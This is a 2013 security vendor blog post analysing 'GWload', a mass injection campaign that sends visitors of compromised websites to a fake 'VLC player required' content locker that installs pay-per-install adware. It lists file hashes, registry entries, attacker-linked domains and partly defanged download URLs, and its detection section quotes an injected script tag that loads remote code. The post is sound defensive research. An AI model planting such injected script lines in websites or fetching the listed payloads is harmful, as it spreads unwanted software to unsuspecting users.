Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

'GWload' - The 'Social Engineering' Based Mass Injection Making Its Rounds

View all posts > 

'GWload' - The 'Social Engineering' Based Mass Injection Making Its Rounds

Posted: 28 Oct 2013 07:30 PM | Elad Sharf | no comments


Websense® Security Labs™ ThreatSeeker® Intelligence Cloud has identified that a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites. This campaign is an evolution and expansion of an existing injection campaign that Websense® Security Labs™ has been monitoring since January of this year. Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users to install rogue software.

We see parallels of the injected websites with websites that were affected by the "cookiebomb" mass injection, which was mostly associated with delivering "ransomware" payloads.  (Our blog on CookieBomb attack is here).  Let's get back to GWload...

 

We've made three key observations about this campaign. The first is the use of a social engineering technique to lure users into downloading malicious and undesirable content.  Although most website injections in the wild redirect to exploit websites, this dominant campaign seems to shift the focus to using a social engineering technique, rather than exploits, to get unwanted content installed on victims' machines. Our second observation is that the time of emergence of this campaign coincides with the arrest of the Blackhole Exploit Kit author 'Paunch,' which could explain the change in mass injection tactics, as actors move from serving exploits to social engineering. This shows that the cyber underground may have contingency plans in place to adapt and react quickly to change. Our third key observation is that the campaign employs an 'end to end' infrastructure of legitimate websites. These legitimate websites become compromised so that they ultimately serve rogue content. The cyber criminals deploy code to defeat ad-blockers and code that 'locks content' and access to the website until a certain action is complete (a technique that in the past has been used with Cost per Action CPA lead-based scams on the Facebook platform. To be clear, conducting CPAlead campaigns is not illegal; however, using CPAlead advertising methods that deceive users is illegal. The ultimate aim of the lure is to install rogue software that compensates the actors through an affiliation program. In this blog we're going to cover the different aspects of this mass injection campaign and share relevant telemetry. 

 

Executive Summary 

 

  • Thousands of legitimate web pages are compromised in a mass injection campaign we dubbed 'GWload' and detected as early as the week of the 14th of October.
  • The campaign employs a social engineering technique to lure users into downloading rogue content.  Most mass injections found in the wild typically redirect to exploit websites; employing a social engineering technique instead of exploits seems to be a shift in focus to push software installations, adware, and spyware without the user's consent.
  • The expansion and emergence of this campaign that employs social engineering techniques also coincides with the arrest of the Blackhole Exploit Kit creator 'Paunch,' which could explain the change in tactics of different cyber-crime actors with their mass injections, as they move from serving exploits to social engineering. This suggests that actors in the cyber underground may have contingency plans in place to adapt and react quickly to change.
  • The campaign employs an 'end to end' infrastructure comprised of legitimate websites under the control of cyber criminals. It was observed that injected code doesn't lead to specially crafted payload websites but to other legitimate websites that became compromised and then are used as the serving points for rogue software installations. This effectively allows rogue content to be harder to detect and defeats detection systems that rely only on reputation.
  • Actors behind this campaign employ a set of open source tools to defeat ad-blocking technologies. The actors aim to monetize successful rogue installations through affiliate programs. The main payload script of the lure uses 'content locking' tactics that are very common with Cost Per Action (CPA) scams that propagate on Facebook, and the code used in this specific case shows a copyright notice from Adscend Media LLC, which is a company that was sued by Facebook for engaging in scams and fraudulent activity on the Facebook platform.

 

Distinct geographical locations of compromised web-servers:

 

Number of injected web pages spotted in the last 7 days:


 

The Lure 

 

Users who browse to a compromised injected website are immediately redirected 'drive-by' style to a second compromised website that (a) effectively blocks all content of the legitimate website and (b) shows them this notification: "VLC player is required for this website, click DOWNLOAD NOW". VLC media player is a legitimate open source media player (the official page is located here). However, VLC player is also known to be abused and bundled with some non-legitimate software, and this is the case with all the "VLC media player" installations that take part in this mass injection campaign; they're all "complemented" with a generous number of unexpected rogue installations of additional software.

 

The lure - how content is 'locked' with conditional access; this is what the user sees when browsing to an injected website (click to enlarge):

 

A website's main page source code, injected with 'GWload' (click to enlarge):

 

A website's Javascript file source code, injected with 'GWload' code alongside a 'Cookiebomb' injection (click to enlarge):

 

Infection & how money is made


If a user is convinced that it is necessary to download and run the file to access the website's content, then unexpected, rogue installations of software will commence on the user's machine. These software installations allow the actors behind this campaign to monetize infections. 'Monetizing' is the keyword here, because the binaries that are downloaded come from the infrastructure of a company called 'Amonetize LTD' - a company with a speciality in 'pay per install' schemes. Basically the company compensates participants of its 'pay per install' programs with money. Here is the definition from the website's FAQ section, to help make things clearer:

 

What is Amonetize? (Click to enlarge):

 

A user who runs the binary will immediately see an installation dialog box of 'VLC player' (see Image 1 below). So far so good: it has the 'VLC Player' logo. But it also has some information written in small letters that the browsing user should probably read. The small letters suggest what's coming, but most users at this stage are eager to get access to the website (or it could be that their curiosity plays a part), and they click 'Next' to advance the installation of what they think is the video player. At this stage the open source package of 'VLC player' is downloaded from the official website, but it's not getting installed.  The next stage asks the user to install 'Registry Helper' (Image 2).  There's a decline button, and choosing to decline helps in that the app doesn't get installed. But clicking the 'Next' button brings a flood of bad news (Image 3), because from that stage on, a lot of software is getting installed on the user's machine silently, in different locations. The initial binaries that get downloaded, run, and installed are "updater.exe" files downloaded from hxxp://cdn3.anotherdownload.com/updater/Updater.exe and "sctmp.exe" from  http://downloadspot7.shoppingchip.info/sctmp.exe.

 

 

Image 1 - Looks like "VLC Player" Installation, but the small print allows for some extras:

 

Image 2 - "Registry Helper" opt-in: 


 

Image 3 - The stage where software installations that take part in the Cost Per Action (CPA) scheme are commenced:


 

 

Here is a summary of all files\applications taking part in the Cost Per Action (CPA) scheme that get installed and run on the machine:

 

SHA1: bce71547dec74a39cca484a3b5a2ec9c844c4575 , filename: sctmp.exe (ShoppingChip)

SHA1: d52e3715b0d1f4a43e9aff2347e6b1fc88a3b7e8 , filename: 294823_.exe (ShoppingChip)

SHA1: 2315be5c129efe4fac36850b225ca2ebeec196ae , filename: 0j.exe (ShoppingChip)

SHA1: 0b9e805077320b0ce1e6620488bd34f1c4d7827e , filename: w.dll (ShoppingChip)

SHA1: 184c60aafbb12d1023b1ce2aff4d3708607a75a1 , filename: W.x64.dll (ShoppingChip)

SHA1: 668437f834b3f4e1e2b6383936528d56c17ca3eb , filename: Updater.exe (Amonetize)

SHA1: 44541bd12d0c1454310babb38ef65579544bb7cb , filename: bundlesweetimsetup.exe (SweetIM\SweetPacks)

SHA1: c077be880adcca469cb8009f9a3f4170497fa011 , filename: spacksyahoo_717_active.exe (SweetIM\SweetPacks)

SHA1: 827ab81eb687b4fe88ac500d6dae475ba7dd2daf , filename: ExtensionUpdaterService.exe (SweetIM\SweetPacks)

SHA1: 3e1726b904874101c93b51c784917f2aedd3863c , filename: Extension32.dll (SweetIM\SweetPacks)

SHA1: ac57ebd667acf5734d3fe5c7f1982440b507bcff , filename: installerhelper.dll (SweetIM\SweetPacks)

SHA1: 2eabe4f755213666dbbbde024a5235ddde02b47f , filename: registry.dll (SweetIM\SweetPacks)

SHA1: 6c4c7be6be33413be0017bb31a78921f61b6cd3b , filenmae: sweetiesetup.exe (SweetIM\SweetPacks)

SHA1: b9fb23cbe82811b97e6c3ad0dac182b8f99c9e9d , filename: 1382915777_45645062_228_4.tmp (SweetIM\SweetPacks)

SHA1: e1606da015762918176602bf3dd696b88351535b , filename: WSSetup.exe (SweetIM\SweetPacks)

SHA1: 63ec07e905abf4f8bbf85b0b721820e4533cd81e , filename: SetXPDriverSigningPolicy.exe (SweetIM\SweetPacks)

SHA!: a7c1b35254f2c1fc56648823b59fbba6577aa4e7 , filename: Coupon_Scout_102.exe (CouponScout)

SHA1: 8c13adefc4a1726a1f12f986c7f7b77375b8a6e2 , filename: psupport.dll (Bprotector)

SHA1: 7efc16c587164083105dd52683ca453f9a64fb17 , filename: cs-browser-assistant-2-0.exe (CS Browser Assistant) 

SHA1: 2ec3760fd906e8dfe827cdbf552b8786348b1121 , filename: Wwyqza.exe (CS Browser Assistant) 

SHA1: 868bc131566a670d9a27742f1f499f2e36107a33 , filename: 44286.crx (CS Browser Assistant) 

SHA1: ee311464e5cee2ea7be63a09a7bd8aaa470243aa , filename: 44286.xpi (CS Browser Assistant) 

SHA1: 9efbf2f1d28936e18b2a17cb853e8623f192e292 , filename: CS Browser Assistant 2.0-bho.dl(CS Browser Assistant) 

 

Here are the Registry modifications that suggest Browser Helper Objects, services, and toolbars: 

 

URLSearchHook: SweetIM ToolbarURLSearchHook Class - {EEE6C35D-6118-11DC-9C72-001320C79847} - C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgHelper.dll

 

BHO: CrossriderApp0044286 - {11111111-1111-1111-1111-110411421186} - C:\Program Files\CS Browser Assistant 2.0\CS Browser Assistant 2.0-bho.dll

 

BHO: Updater By Sweetpacks Helper - {DEDAF650-12B8-48f5-A843-BBA100716106} - C:\Program Files\Updater By Sweetpacks\Extension32.dll

 

BHO: ShoppingChip - {EBFD7D4B-EF00-3F7D-A2C7-4C6C23DCAFAC} - C:\Program Files\ShoppingChip\W.dll

 

BHO: SWEETIE - {EEE6C35C-6118-11DC-9C72-001320C79847} - C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll

 

Toolbar: SweetPacks Toolbar for Internet Explorer - {EEE6C35B-6118-11DC-9C72-001320C79847} - C:\Program Files\SweetIM\Toolbars\Internet Explorer\mgToolbarIE.dll

 

Service: Updater By Sweetpacks - Unknown owner - C:\Program Files\Updater By Sweetpacks\ExtensionUpdaterService.exe

 

 

To summarize this section, a significant amount of unexpected and unwanted software may have found its way to the user's machine, including: ShoppingChip, SweetIM\SweetPacks, Amonetize Updater, CouponScout, Bprotector & CS Browser Assistant.  We hope there won't be more.

 

 

How the lure code operates, and relationship to rogue CPAlead campaigns on Facebook

 

The script that is loaded by an injected website with 'GWload' also resides on an injected website and follows a two-stage process (related source code is demonstrated in the images below). The first stage is the 'locker page loader' where steps are taken to prepare the browser to load the 'content locker page'.  Among its various actions, it prepares the frame where the 'content locker page' is going to reside and sets a cookie on the user's machine. At this stage, the script won't redirect to the 'content locker page' and lock the website's content if there was no referrer set to the request.  This means that the 'content locker page' will show and activate only if the user was referred from another website, such as a search engine result. If everything checks out at the first stage, then the 'content locker page' is loaded, and it blocks the website's legitimate content from the user, permitting access only if 'VLC Media Player' is downloaded and installed. Digging a bit deeper and looking for references in the code section 'gwloaded = false' over the web shows that it's associated with tools that aim to evade browser-based "Ad blockers" software. In fact, the comments at the start of the script claim in plain sight that the script and its contents are the intellectual property of Adscend Media LLC. Adscend Media LLC is a company that was sued by Facebook; Facebook claimed that the company engaged in scam and fraudulent activity on the Facebook platform. A lot of the scams on Facebook employ social engineering tricks similar to this mass injection: they typically condition access to content if certain steps are executed by the user; conditions vary and may include filling out a survey or installing software. This model of on-line advertising is called "Cost Per Action" (CPA) or "Pay Per Action" (PPA), where the advertiser pays for each specified action commenced by the user.

 

Once the 'content locker page' loads, it prompts the user to download the software with several links leading to the same location at trackergeo.com. This domain acts as a statistics collector; checking the Whois data for that website shows that it was registered by a zhang jing and with email address derqe43@qq.com; commencing a reverse Whois lookup on the email address reveals more domains that have a low reputation and that were registered ~14-20 days ago:

 

fulllocalbabez.com

nicelocalbabez.com

shishang558.com

malelocalbabez.com

teng8teng8.com

ownlocalbabez.com

gxtopit.com

lowlocalbabez.com

okaylocalbabez.com

xjjiaoy.com

nulllocalbabez.com

wiselocalbabez.com

lizhengqu.com

xjyinxiao88.com

 

 

trackergeo.com redirects to hxxp://www.winmediaplayer.com/direct-download.html?version=1.1.8.21&iaff1=10084&ci=3793&capp=MediaPlayer, which further redirects to download the installation file at hxxp://www.askdownload.com/download.php?version=1.1.8.21&prefix=VLCMediaPlayer&campid=3793&capp=MediaPlayer&iaff1=10084.

 

The file downloaded named VLCMediaPlayer__3793_il256.exe (SHA1: 7e8593c36209afa8f065ac00aa3d3b40b738dc00) is the main file that starts the process of installing unwanted software, as we described in the previous section. A summary report from Websense' sandbox ThreatScope™ show that the file tries to connect and download suspicious content from the web address idyllicdownload.com/index.php, a website registered by Amonetize LTD.

 

winmediaplayer.com and askdownload.com are registered by Amonetize LTD. You can notice the affiliate ID marked in bold above: 10084, this number is how Amonetize can track and associate downloads to affiliates and compensate them accordingly. If we do a reverse Whois lookup on recent domains that are owned by Amonetize LTD we spot some interesting matches:

 

invitedownload.com

offerswizard.com

paidtoinstall.com

existentdownload.com

offerswizard.net

winmediashare.com

ezitenom.com

varietydownload.com

accuratedownload.com

bestflashplayer.net

amonetize-reports.com

winflashdownload.org

smashflashplayer.org

offerswizard.org

bestflashplayer.org

winpdfcreator.com

wintvapp.com

bestflashplayer.com

amonstat.com

mindownload.com

keenondownload.com

fixeddownload.com

amusingdownload.com

alwaysdownload.com

usualdownload.com

unusualdownload.com

winflashdownload.info

winapptv.com

preferdownload.com

promptdownload.com

hottestdownload.com

3rddownload.com

naturaldownload.com

realmdownload.com

idyllicdownload.com

wishdownload.com

validdownload.com

okaydownload.com

stylishdownload.com

smashflashplayer.info

winflashplayer.com

winflashdownload.net

anotherdownload.com

winnerdownload.com

properdownload.com

beyonddownload.com

insidedownload.com

visiondownload.com

vitaldownload.com

downloadokay.com

winflashplayer.net

smashflashplayer.net

winpdfreader.com

statedownload.com

soledownload.com

smashflashplayer.com

worthdownload.com

immensedownload.com

intactdownload.com

chicdownload.com

honestdownload.com

downloadfixed.com

downloadwish.com

sensedownload.com

gethdplugin.com

winvlc.com

win7zip.com

intodownload.com

optdownload.com

downloadalways.com

brainydownload.com

thisisdownload.com

justlydownload.com

2nddownload.com

commondownload.com

steerdownload.com

winflashdownload.com

compress-it.com

 

The first stage - the 'locker page loader':


 

 

The second stage - the 'locker page':


 

 

 

Telemetry 

 

Our telemetry shows that different and diverse sets of websites are affected by this attack.  Below is a chart that shows the top 20 categories of websites that have been injected with 'GWload".  Leading the chart are websites that fall under the 'Business and Economy' category, followed by 'Sex' websites, 'Web hosting' websites, and 'Information Technology' websites. Closing the top five of injected websites is the 'Travel' websites category.

 

Top 20 categories of websites injected with 'GWload' (click to enlarge): 


 

 

Top Ten Injected Countries:

 

 

Detection

 

An injected website can be identified by looking for the next two keywords in the page's source code:

1. >var gwloaded = false;< 

2. .php" type="text/javascript"></script>

 

Injected code example:

<script type="text/javascript">var gwloaded = false;</script>

<script src="http://brandway.home.pl/blekitna_pl/mDJkxzca.php" type="text/javascript"></script>

 

ThreatSeeker detecting the insertion of malicious code to legitimate website (click to enlarge):


 

 

Summary

 

In this blog we described a mass injection campaign that emerged in the past two weeks and that continues to affect thousands of websites across the globe. We noticed that this mass injection uses a social engineering trick that locks legitimate websites' content to lure potential victims to install applications that participate in Cost Per Action (CPA) advertising schemes. This change in tactics that occurred in the past two weeks coincides with the arrest of the Blackhole Exploit Kit author 'Paunch,' which could suggest that actors adapt to change rapidly to keep their attack going. It was also apparent that certain scripts used by actors to serve social engineering-based attack vectors are interchangeable across different attack platforms; we witnessed with 'GWload' that code that mostly was used in social engineering-based attacks on Facebook has now migrated and is used with mass injections.

 

Websense customers are protected from injected websites and the different stages of this threat with our Advanced Classification Engine - ACE.



Leave a Comment

(required)  

Email address: (required)